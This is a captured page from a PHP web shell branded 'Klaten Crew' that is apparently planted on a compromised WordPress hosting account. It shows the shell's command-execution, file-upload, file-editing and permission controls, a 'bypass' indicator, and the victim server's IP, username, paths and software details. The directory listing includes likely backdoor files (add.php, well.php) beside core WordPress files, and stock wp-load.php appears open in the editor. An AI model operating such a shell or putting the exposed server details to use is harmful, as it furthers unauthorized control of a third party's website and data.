HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.0
System Info
HOME
home
ipifapor
public_html
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 17:22:38
-
.tmb
Folder
-
0777
2026-07-24 20:42:11
.well-known
Folder
-
0755
2025-03-12 03:07:42
author
Folder
-
0755
2026-07-24 21:52:11
cgi-bin
Folder
-
0755
2024-05-20 23:48:36
contacto
Folder
-
0755
2026-07-24 21:50:56
directorio
Folder
-
0755
2026-07-24 21:42:35
doc
Folder
-
0755
2026-06-14 07:44:26
formacion
Folder
-
0755
2026-07-27 18:29:11
images
Folder
-
0755
2026-06-14 10:15:26
neftan
Folder
-
0755
2026-04-04 10:49:36
nosotros
Folder
-
0755
2026-07-24 21:47:28
organigrama
Folder
-
0755
2026-07-24 21:48:59
servicios
Folder
-
0755
2026-07-24 21:46:05
wp-admin
Folder
-
0755
2026-06-04 20:21:16
wp-content
Folder
-
0755
2026-07-30 17:23:38
wp-includes
Folder
-
0755
2026-07-17 19:28:51
.htaccess
File
812 B
0644
2026-07-24 10:05:59
add.php
File
13.68 KB
0644
2026-07-24 20:36:26
baner.jpg
File
164.45 KB
0644
2025-05-15 12:51:24
error_log
File
35.15 KB
0644
2026-07-30 01:25:09
google03cc0fa23fa7b025.html
File
53 B
0644
2026-07-24 20:44:50
index.php
File
405 B
0644
2020-02-06 11:33:12
license.txt
File
19.44 KB
0644
2026-01-01 05:07:30
material.pptx
File
1.24 MB
0644
2025-05-15 12:51:04
promayores
File
283.86 KB
0644
2026-06-14 07:36:20
readme.html
File
7.23 KB
0644
2026-07-17 19:28:51
well.php
File
7.21 KB
0644
2026-07-24 20:37:28
wp-activate.php
File
7.2 KB
0644
2026-02-17 22:05:44
wp-blog-header.php
File
510 B
0444
2026-07-27 18:29:15
wp-comments-post.php
File
2.27 KB
0644
2023-06-14 19:11:16
wp-config-sample.php
File
3.26 KB
0644
2025-08-12 19:47:32
wp-config.php
File
3.44 KB
0644
2025-03-07 15:08:27
wp-cron.php
File
5.49 KB
0644
2024-08-03 00:40:16
wp-links-opml.php
File
2.43 KB
0644
2025-04-30 17:52:30
wp-load.php
File
3.84 KB
0644
2024-03-11 15:05:16
wp-login.php
File
50.63 KB
0644
2026-03-01 03:57:46
wp-mail.php
File
8.52 KB
0644
2025-04-03 03:25:26
wp-settings.php
File
31.88 KB
0644
2026-05-08 20:59:44
wp-signup.php
File
33.81 KB
0644
2026-02-17 22:05:44
wp-trackback.php
File
5.09 KB
0644
2025-08-19 17:30:32
xmlrpc.php
File
3.13 KB
0644
2024-11-08 20:52:18
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: wp-load.php
<?php /** * Bootstrap file for setting the ABSPATH constant * and loading the wp-config.php file. The wp-config.php * file will then load the wp-settings.php file, which * will then set up the WordPress environment. * * If the wp-config.php file is not found then an error * will be displayed asking the visitor to set up the * wp-config.php file. * * Will also search for wp-config.php in WordPress' parent * directory to allow the WordPress directory to remain * untouched. * * @package WordPress */ /** Define ABSPATH as this file's directory */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /* * The error_reporting() function can be disabled in php.ini. On systems where that is the case, * it's best to add a dummy function to the wp-config.php file, but as this call to the function * is run prior to wp-config.php loading, it is wrapped in a function_exists() check. */ if ( function_exists( 'error_reporting' ) ) { /* * Initialize error reporting to a known set of levels. * * This will be adapted in wp_debug_mode() located in wp-includes/load.php based on WP_DEBUG. * @see https://www.php.net/manual/en/errorfunc.constants.php List of known error levels. */ error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); } /* * If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php * doesn't, load wp-config.php. The secondary check for wp-settings.php has the added benefit * of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a) * and /blog/ is WordPress(b). * * If neither set of conditions is true, initiate loading the setup process. */ if ( file_exists( ABSPATH . 'wp-config.php' ) ) { /** The config file resides in ABSPATH */ require_once ABSPATH . 'wp-config.php'; } elseif ( @file_exists( dirname( ABSPATH ) . '/wp-config.php' ) && ! @file_exists( dirname( ABSPATH ) . '/wp-settings.php' ) ) { /** The config file resides one level above ABSPATH but is not part of another installation */ require_once dirname( ABSPATH ) . '/wp-config.php'; } else { // A config file doesn't exist. define( 'WPINC', 'wp-includes' ); require_once ABSPATH . WPINC . '/version.php'; require_once ABSPATH . WPINC . '/compat.php'; require_once ABSPATH . WPINC . '/load.php'; // Check for the required PHP version and for the MySQL extension or a database drop-in. wp_check_php_mysql_versions(); // Standardize $_SERVER variables across setups. wp_fix_server_vars(); define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' ); require_once ABSPATH . WPINC . '/functions.php'; $path = wp_guess_url() . '/wp-admin/setup-config.php'; // Redirect to setup-config.php. if ( ! str_contains( $_SERVER['REQUEST_URI'], 'setup-config' ) ) { header( 'Location: ' . $path ); exit; } wp_load_translations_early(); // Die with an error message. $die = '<p>' . sprintf( /* translators: %s: wp-config.php */ __( "There doesn't seem to be a %s file. It is needed before the installation can continue." ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p>' . sprintf( /* translators: 1: Documentation URL, 2: wp-config.php */ __( 'Need more help? <a href="%1$s">Read the support article on %2$s</a>.' ), __( 'https://developer.wordpress.org/advanced-administration/wordpress/wp-config/' ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p>' . sprintf( /* translators: %s: wp-config.php */ __( "You can create a %s file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file." ), '<code>wp-config.php</code>' ) . '</p>'; $die .= '<p><a href="' . $path . '" class="button button-large">' . __( 'Create a Configuration File' ) . '</a></p>'; wp_die( $die, __( 'WordPress › Error' ) ); }
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.0 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED